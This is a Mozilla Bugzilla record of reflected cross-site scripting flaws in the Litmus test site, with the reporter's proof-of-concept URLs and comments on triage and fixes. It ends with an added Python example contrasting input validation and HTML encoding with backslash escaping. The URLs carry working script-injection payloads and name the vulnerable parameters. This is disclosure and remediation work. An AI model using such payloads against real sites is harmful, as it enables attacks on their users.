Closed
Bug 613272
Opened 14 years ago
Closed 13 years ago
Reflected XSS in https://litmus.mozilla.org/
Categories
(Webtools Graveyard :: Litmus, defect, P2)
Tracking
(Not tracked)
VERIFIED
FIXED
People
(Reporter: ervistusha, Assigned: coop)
Details
(Keywords: wsec-xss, Whiteboard: [infrasec:xss][ws:high])
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
Build Identifier: https://litmus.mozilla.org/advanced_search.cgi?test_run=&product=&branch=&testgroup=&subgroup=&testcase=&platform=&opsys=&locale=&result_status=&start_date=&timespan=&end_date=Now&search_field1=build_id&match_criteria1=contains_all&search_value1=%3Cscript%3Ealert(1)%3C/script%3E&search_field2=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria2=contains_all&search_value2=%3Cscript%3Ealert(1)%3C/script%3E&search_field3=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria3=contains_all&search_value3=%3Cscript%3Ealert(1)%3C/script%3E&search_field4=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria4=contains_all&search_value4=%3Cscript%3Ealert(1)%3C/script%3E&sort_field1=%3Cscript%3Ealert(1)%3C/script%3E&sort_order1=ASC&sort_field2=%3Cscript%3Ealert(1)%3C/script%3E&sort_order2=ASC&sort_field3=&sort_order3=ASC&sort_field4=&sort_order4=ASC&limit=15&automated=all&withbugs=all

Reproducible: Always

Steps to Reproduce:
1. https://litmus.mozilla.org/advanced_search.cgi?test_run=&product=&branch=&testgroup=&subgroup=&testcase=&platform=&opsys=&locale=&result_status=&start_date=&timespan=&end_date=Now&search_field1=build_id&match_criteria1=contains_all&search_value1=%3Cscript%3Ealert(1)%3C/script%3E&search_field2=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria2=contains_all&search_value2=%3Cscript%3Ealert(1)%3C/script%3E&search_field3=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria3=contains_all&search_value3=%3Cscript%3Ealert(1)%3C/script%3E&search_field4=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria4=contains_all&search_value4=%3Cscript%3Ealert(1)%3C/script%3E&sort_field1=%3Cscript%3Ealert(1)%3C/script%3E&sort_order1=ASC&sort_field2=%3Cscript%3Ealert(1)%3C/script%3E&sort_order2=ASC&sort_field3=&sort_order3=ASC&sort_field4=&sort_order4=ASC&limit=15&automated=all&withbugs=all
2.
3.
Reporter
Comment 1•14 years ago
It seems Litmus has a lot of bugs; if you like, I can do a careful scan.
Updated•14 years ago
Group: core-security → websites-security
Component: General → Other
Product: Core → Websites
QA Contact: general → other
Updated•14 years ago
Group: websites-security → webtools-security
Component: Other → Litmus
Product: Websites → Webtools
QA Contact: other → litmus
Version: unspecified → other
Comment 2•14 years ago
Reflected XSS issue confirmed on the Litmus website.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Reporter
Comment 3•14 years ago
https://litmus.mozilla.org/search_results.cgi?product=%3Cscript%3Ealert%281%29%3C/script%3E
Reporter
Comment 4•14 years ago
https://litmus.mozilla.org/edit_users.cgi seems vulnerable. Sorry for the spam today :)
Updated•14 years ago
Whiteboard: [infrasec:xss][ws:high]
Comment 7•13 years ago
Additional parameters are vulnerable.

POC from 648857
search_results.cgi
result_status
https://litmus.mozilla.org/search_results.cgi?limit=50&order_by_created=DESC&result_status="><script>alert(String.fromCharCode(88,83,83))</script>

advanced_search.cgi
product
https://litmus.mozilla.org/advanced_search.cgi?test_run=&product="<B onmouseover="document.location='http://www.google.com/'">
Comment 11•13 years ago
Other vulnerable parameters from above bugs

625007
page: search_results.cgi
parameter: result_status

622109
page: advanced_search.cgi
parameter: test_run

622186
page: advanced_search.cgi
parameter: test_run, result_status, locale, match_criteria
Comment 13•13 years ago
Sorry for the bug spam. This should be the last one.

From 626032
advanced_search.cgi
branch
Assignee
Updated•13 years ago
Assignee: nobody → coop
Status: NEW → ASSIGNED
Priority: -- → P2
Assignee
Comment 14•13 years ago
Sort/search validation added by:
http://hg.mozilla.org/webtools/litmus/rev/0921d91aed12

Other search vulns fixed by other commits since the bug was filed.
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Comment 15•13 years ago
fixed? wtf...for me still works fine !
Assignee
Comment 16•13 years ago
(In reply to comment #15)
> fixed? wtf...for me still works fine !

Could you please be more specific? There are 8 vulns mentioned in this bug (only some of which have example queries), not including those that were duped to this one.
Comment 17•13 years ago
I've looked and I couldn't replicate any of the vulns mentioned in this bug or any of the dupes which I had access to (1). I've asked for a security flag on my Bugzilla account, but I was denied. Wonder if I can appeal that decision?
Comment 18•13 years ago
Checked POCs listed in this bug and duplicates. Confirmed that all issues are properly handled. If anyone observes vulnerabilities that are still present, then please file a new bug and include a note that the item was looked at per this bug.
Status: RESOLVED → VERIFIED
Comment 19•13 years ago
Already sent another PoC.
Comment 20•13 years ago
https://litmus.mozilla.org/search_results.cgi?order_by_created=DESC&timespan=all&result_status=fail&limit=50'"--></style></script><script>alert('XSS')</script>

http://oi51.tinypic.com/2hogqdg.jpg :-P
Reporter
Comment 21•13 years ago
How can I unsubscribe from this bug?
I reported it some months ago :)
If I have time I will scan the site again :)
I wasn't rewarded for the XSS and SQL reported at Litmus :(
Also, I think adding "\" will not fix the XSS bug.
Comment 22•13 years ago
(In reply to comment #21)
> How can I unsubscribe from this bug?

Beside "CC List" click edit, select your email address and check the box "Remove selected CC" and click Save Changes at the bottom of the bug. However, this will only work if you are on the CC list. I'm not sure how, or even if you can remove yourself from a bug which you reported.
Assignee
Comment 23•13 years ago
(In reply to comment #21)
> How can I unsubscribe from this bug?
> I reported it some months ago :)

I can't see the security bugs either until I get cc-ed on them, but I do try to turn them around quickly once I am.

> Also, I think adding "\" will not fix the XSS bug.

And yet the above examples no longer work.

(In reply to comment #20)
> https://litmus.mozilla.org/search_results.cgi?order_by_created=DESC&timespan=all&result_status=fail&limit=50'"--></style></script><script>alert('XSS')</script>

Is this the same bug you're talking about in comment 19? Either file a new bug *or* post something here otherwise something will get missed.

Fixed by:
http://hg.mozilla.org/webtools/litmus/rev/a94e98b1bfb5
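The two remediation themes in this thread, sort/search validation (comment 14) and the question in comments 21 and 23 of whether adding "\" is enough, shown as an added example. This is not Litmus code and not the content of the linked commits; the allowlists and function names are assumptions made for illustration.

```python
import html
from urllib.parse import parse_qs

# Assumed allowlists; only build_id, contains_all, ASC and DESC appear as
# values in the bug's URLs, the rest are illustrative.
ALLOWED = {
    "search_field": {"build_id", "product", "branch", "locale"},
    "sort_field": {"build_id", "product", "branch", "locale"},
    "sort_order": {"ASC", "DESC"},
    "match_criteria": {"contains_all"},
}


def validate_search(query: str) -> dict:
    """Drop enumerated search/sort parameters whose value is not allowlisted."""
    clean = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        value = values[0]
        prefix = next((p for p in ALLOWED if name.startswith(p)), None)
        if prefix is None:
            clean[name] = value  # free text: must be encoded at output time
        elif value in ALLOWED[prefix]:
            clean[name] = value
    return clean


def backslash_escape(value: str) -> str:
    """Quote escaping as used for string literals; not an HTML encoding."""
    return value.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def render_input(name: str, value: str, encode=html.escape) -> str:
    """Reflect a parameter into an HTML attribute, as a search form does."""
    return f'<input name="{html.escape(name)}" value="{encode(value)}">'


# Constructed sample query, built from parameters quoted in this bug.
SAMPLE = ("search_field1=build_id&match_criteria1=contains_all"
          "&search_value1=%3Cscript%3Ealert(1)%3C/script%3E"
          "&sort_field1=%3Cscript%3Ealert(1)%3C/script%3E&sort_order1=ASC")
# Value of result_status from comment 7.
PAYLOAD = '"><script>alert(String.fromCharCode(88,83,83))</script>'

if __name__ == "__main__":
    print(validate_search(SAMPLE))                                   # sort_field1 dropped
    print(render_input("result_status", PAYLOAD, backslash_escape))  # markup survives
    print(render_input("result_status", PAYLOAD))                    # markup encoded
```

Validation covers parameters that take a fixed set of values; free-text values such as search_value1 pass through and are only safe once encoded for the HTML context they are written into.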
Updated•12 years ago
Group: webtools-security
Comment 25•11 years ago
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Updated•8 years ago
Product: Webtools → Webtools Graveyard